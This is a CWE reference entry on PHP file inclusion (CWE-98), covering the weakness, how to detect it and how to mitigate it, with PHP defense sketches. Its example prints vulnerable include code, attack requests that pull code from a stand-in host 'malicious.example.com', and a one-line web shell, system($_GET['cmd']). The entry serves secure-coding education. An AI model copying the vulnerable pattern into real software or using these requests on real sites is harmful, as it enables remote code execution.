CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
Weakness ID: 98 (Weakness Base)
Status: Draft
Description
Description Summary
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
Extended Description
In certain versions and configurations of PHP, this weakness can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases, in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Alternate Terms
PHP remote file inclusion
Local file inclusion:
This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker's control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs.
Time of Introduction
Implementation
Architecture and Design
Applicable Platforms
Languages
PHP: (Often)
Common Consequences
Scope
Effect
Integrity
Confidentiality
Availability
Technical Impact: Execute unauthorized code or commands
The attacker may be able to specify arbitrary code to be executed from
a remote location. Alternatively, it may be possible to use normal
program behavior to insert PHP code into files on the local machine,
such as web access logs. When such a file is later included, the
injected code executes, because PHP treats everything outside the PHP
tags as literal output and runs only the content between them.
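The behavior described above can be reproduced in isolation. The following is a minimal sketch, assuming PHP 7 or later; the log line, the temporary file, and the harmless arithmetic payload are all hypothetical stand-ins for a poisoned access log.

```php
<?php
// Simulate a log file that was "poisoned" by a request whose URL contained
// a PHP snippet. The file name and contents are made up for this sketch.
$logFile = tempnam(sys_get_temp_dir(), 'log');
file_put_contents(
    $logFile,
    '127.0.0.1 "GET /?x=<?php echo 6 * 7; ?> HTTP/1.1" 404' . "\n"
);

// include copies text outside the PHP tags to the output unchanged and
// executes whatever sits between the tags.
ob_start();
include $logFile;
$rendered = ob_get_clean();
unlink($logFile);

echo $rendered; // prints: 127.0.0.1 "GET /?x=42 HTTP/1.1" 404
```

The surrounding log text passes through untouched, while the embedded expression is evaluated. A real payload would run with the privileges of the PHP process.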
Likelihood of Exploit
High to Very High
Detection Methods
Manual Analysis
Manual white-box analysis can be very effective for finding this
issue, since there is typically a relatively small number of include or
require statements in each program.
Effectiveness: High
Automated Static Analysis
The external control or influence of filenames can often be detected
using automated static analysis that models data flow within the
software.
Automated static analysis might not be able to recognize when proper
input validation is being performed, leading to false positives - i.e.,
warnings that do not have any security consequences or require any code
changes. If the program uses a customized input validation library, then
some tools may allow the analyst to create custom signatures to detect
usage of those routines.
Demonstrative Examples
Example 1
The following code attempts to include a function contained in a
separate PHP page on the server. It builds the path to the file by using the
supplied 'module_name' parameter and appending the string '/function.php' to
it.
victim.php
(Bad Code)
Example
Language: PHP
$dir = $_GET['module_name'];
include($dir . "/function.php");
The problem with the above code is that the value of $dir is not
restricted in any way, and a malicious user could manipulate the
'module_name' parameter to force inclusion of an unanticipated file. For
example, an attacker could request the above PHP page (victim.php) with
a 'module_name' of "http://malicious.example.com" by using the following
request string:
(Attack)
victim.php?module_name=http://malicious.example.com
Upon receiving this request, the code would set 'module_name' to the
value "http://malicious.example.com" and would attempt to include
http://malicious.example.com/function.php, along with any malicious code
it contains.
For the sake of this example, assume that the malicious version of
function.php looks like the following:
(Bad Code)
system($_GET['cmd']);
An attacker could now go a step further in our example and provide a
request string as follows:
(Attack)
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l
The code will attempt to include the malicious function.php file from
the remote site. In turn, this file executes the command specified in
the 'cmd' parameter from the query string. The end result is an attempt
by victim.php to execute the potentially malicious command, in this
case:
(Attack)
/bin/ls -l
Note that the above PHP example can be mitigated by setting
allow_url_fopen to false, although this will not fully protect the code.
See potential mitigations.
Observed Examples
PHP file inclusion issue, both remote and local; the local include uses
".." and "%00" characters as a manipulation, but many remote file
inclusion issues probably have this vector.
Potential Mitigations
Phase: Architecture and Design
Strategy: Libraries or Frameworks
Use a vetted library or framework that does not allow this weakness to
occur or provides constructs that make this weakness easier to
avoid.
Phase: Architecture and Design
Strategy: Enforcement by Conversion
When the set of acceptable objects, such as filenames or URLs, is
limited or known, create a mapping from a set of fixed input values
(such as numeric IDs) to the actual filenames or URLs, and reject all
other inputs.
For example, ID 1 could map to "inbox.txt" and ID 2 could map to
"profile.txt". Features such as the ESAPI AccessReferenceMap provide
this capability.
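A minimal sketch of such a mapping for include files is shown here, assuming PHP 7.1 or later. The IDs, the file names (".php" rather than ".txt", since the targets are meant to be included), and the function name resolve_page are hypothetical.

```php
<?php
// Hypothetical mapping from numeric IDs to include files. The IDs and
// file names are assumptions made for this illustration.
const PAGE_MAP = [
    1 => 'inbox.php',
    2 => 'profile.php',
];

/**
 * Return the include path for a request-supplied ID, or null when the ID
 * is not in the map. User input only selects an entry; it never becomes
 * part of the path.
 */
function resolve_page(string $rawId, string $baseDir): ?string
{
    // Accept plain decimal digits only, so values such as "1abc" cannot
    // slip through loose numeric conversion.
    if (!ctype_digit($rawId)) {
        return null;
    }
    $id = (int) $rawId;
    if (!array_key_exists($id, PAGE_MAP)) {
        return null;
    }
    return $baseDir . '/' . PAGE_MAP[$id];
}
```

A caller would include the returned path only when it is not null and reject the request otherwise. Because the path is assembled entirely from values fixed in the code, neither a URL nor a traversal sequence in the parameter can reach the include statement.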
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Phases: Architecture and Design; Operation
Strategy: Sandbox or Jail
Run your code in a "jail" or similar sandbox environment that enforces
strict boundaries between the process and the operating system. This may
effectively restrict which files can be accessed in a particular
directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux.
In general, managed code may provide some protection. For example,
java.io.FilePermission in the Java SecurityManager allows you to specify
restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to
the operating system; the rest of your application may still be subject
to compromise.
Be careful to avoid CWE-243 and other weaknesses related to jails.
Effectiveness: Limited
The effectiveness of this mitigation depends on the prevention
capabilities of the specific sandbox or jail being used and might only
help to reduce the scope of an attack, such as restricting the attacker
to certain system calls or limiting the portion of the file system that
can be accessed.
Phases: Architecture and Design; Operation
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to
accomplish the necessary tasks. If possible, create isolated accounts
with limited privileges that are only used for a single task. That way,
a successful attack will not immediately give the attacker access to the
rest of the software or its environment. For example, database
applications rarely need to run as the database administrator,
especially in day-to-day operations.
Phase: Implementation
Strategy: Input Validation
Assume all input is malicious. Use an "accept known good" input
validation strategy, i.e., use a whitelist of acceptable inputs that
strictly conform to specifications. Reject any input that does not
strictly conform to specifications, or transform it into something that
does. Do not rely exclusively on looking for malicious or malformed
inputs (i.e., do not rely on a blacklist). However, blacklists can be
useful for detecting potential attacks or determining which inputs are
so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant
properties, including length, type of input, the full range of
acceptable values, missing or extra inputs, syntax, consistency across
related fields, and conformance to business rules. As an example of
business rule logic, "boat" may be syntactically valid because it only
contains alphanumeric characters, but it is not valid if you are
expecting colors such as "red" or "blue."
For filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.
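The filename rules above might be sketched as follows, assuming PHP 7.1 or later. The function name safe_module_path, the 64-character limit, and the fixed ".php" extension are assumptions for this illustration; the realpath() containment check is an additional defense-in-depth step, not something the text above prescribes.

```php
<?php
/**
 * Validate a request-supplied module name and resolve it to a file inside
 * $baseDir. Returns the resolved path, or null if any check fails.
 * The function name and directory layout are hypothetical.
 */
function safe_module_path(string $name, string $baseDir): ?string
{
    // Allow only letters, digits, underscore, and hyphen. This excludes
    // ".", "/", "\", ":", and NUL bytes, so neither traversal sequences
    // nor URL schemes can pass.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }

    // The extension is fixed by the code, not chosen by the caller.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }

    // Defense in depth: the resolved path (symlinks followed) must still
    // sit under the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}
```

Applied to the earlier example, a 'module_name' of "http://malicious.example.com" or "../../logs/access" fails the character check before any file system access takes place.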
Phases: Architecture and Design; Operation
Strategy: Identify and Reduce Attack Surface
Store library, include, and utility files outside of the web document
root, if possible. Otherwise, store them in a separate directory and use
the web server's access control capabilities to prevent attackers from
directly requesting them. One common practice is to define a fixed
constant in each calling program, then check for the existence of the
constant in the library/include file; if the constant does not exist,
then the file was directly requested, and it can exit
immediately.
This significantly reduces the chance of an attacker being able to
bypass any protection mechanisms that are in the base program but not in
the include files. It will also reduce your attack surface.
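The constant check described above can be sketched in a single script, assuming PHP 7 or later. The constant name APP_ENTRY and the library contents are hypothetical. A real include file would more commonly call exit at the guard; this sketch uses return only so that one script can show both outcomes.

```php
<?php
// Contents of a hypothetical include file. Its first statement stops the
// file unless the calling program has defined the marker constant.
$guardedLibrary = <<<'PHP'
<?php
if (!defined('APP_ENTRY')) {
    return 'blocked'; // a real file would typically exit here
}
return 'loaded';
PHP;

$file = tempnam(sys_get_temp_dir(), 'lib');
file_put_contents($file, $guardedLibrary);

// Direct request: nothing has defined the constant yet.
$direct = include $file;

// Normal path: the calling program defines the constant, then includes.
define('APP_ENTRY', true);
$viaCaller = include $file;
unlink($file);

echo $direct, ' / ', $viaCaller, "\n"; // prints: blocked / loaded
```

The guard only detects direct requests. It does not validate which file a calling program chooses to include, so it complements input validation and does not replace it.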
Phases: Architecture and Design; Implementation
Strategy: Identify and Reduce Attack Surface
Understand all the potential areas where untrusted inputs can enter
your software: parameters or arguments, cookies, anything read from the
network, environment variables, reverse DNS lookups, query results,
request headers, URL components, e-mail, files, filenames, databases,
and any external systems that provide data to the application. Remember
that such inputs may be obtained indirectly through API calls.
Many file inclusion problems occur because the programmer assumed that
certain inputs could not be modified, especially for cookies and URL
components.
Phase: Operation
Strategy: Firewall
Use an application firewall that can detect attacks against this
weakness. It can be beneficial in cases in which the code cannot be
fixed (because it is controlled by a third party), as an emergency
prevention measure while more comprehensive software assurance measures
are applied, or to provide defense in depth.
Effectiveness: Moderate
An application firewall might not cover all possible input vectors. In
addition, attack techniques might be available to bypass the protection
mechanism, such as using malformed inputs that can still be processed by
the component that receives those inputs. Depending on functionality, an
application firewall might inadvertently reject or modify legitimate
requests. Finally, some manual effort may be required for
customization.
Phases: Operation; Implementation
Strategy: Environment Hardening
Develop and run your code in the most recent supported version of PHP
available. Many of the highly risky features in earlier PHP interpreters
have been removed, restricted, or disabled by default.
Phases: Operation; Implementation
Strategy: Environment Hardening
Configure your application so that it does not use register_globals, which was deprecated in PHP 5.3 and removed in PHP 5.4. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
Often, programmers do not protect direct access to files intended only
to be included by core programs. These include files may assume that
critical variables have already been initialized by the calling program.
As a result, the use of register_globals combined with the ability to
directly access the include file may allow attackers to conduct file
inclusion attacks. This remains an extremely common pattern as of
2009.
Phase: Operation
Strategy: Environment Hardening
Set allow_url_fopen to false, which limits the ability to include
files from remote locations.
Effectiveness: High
Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion.
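A deployment can verify this setting at startup instead of assuming it. The following is a minimal sketch, assuming PHP 7 or later; the function name enabled_url_directives is hypothetical. It also checks allow_url_include, a related directive available since PHP 5.2 that governs include and require specifically and is not mentioned in the text above.

```php
<?php
/**
 * Report which URL-related settings are still enabled, so that a bootstrap
 * script or health check can react. The function name is hypothetical; the
 * two directive names are PHP's own.
 *
 * These directives are normally set in php.ini, for example:
 *     allow_url_fopen   = Off
 *     allow_url_include = Off
 */
function enabled_url_directives(): array
{
    $enabled = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $directive) {
        // ini_get() returns a string such as "1", "", "On", or "Off",
        // or false if the directive is unknown to this PHP build.
        $value = ini_get($directive);
        if (filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $enabled[] = $directive;
        }
    }
    return $enabled;
}

$risky = enabled_url_directives();
if ($risky !== []) {
    error_log('Remote URL wrappers enabled: ' . implode(', ', $risky));
}
```

As noted above, a clean result from this check says nothing about path traversal, so local file inclusion still has to be prevented through input validation.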
Relationship Notes
This is frequently a functional consequence of other weaknesses. It is
usually multi-factor with other factors (e.g. MAID, Modification of
Assumed-Immutable Data), although not all inclusion bugs involve
assumed-immutable data. Direct request weaknesses frequently play a role.
Can overlap directory traversal in local inclusion problems.
Research Gaps
Under-researched and under-reported. Other interpreted languages with
"require" and "include" functionality could also produce vulnerable
applications, but as of 2007, PHP has been the focus. Any web-accessible
language that uses executable file extensions is likely to have this type of
issue, such as ASP, since .asp extensions are typically executable.
Languages such as Perl are less likely to exhibit these problems because the
.pl extension isn't always configured to be executable by the web
server.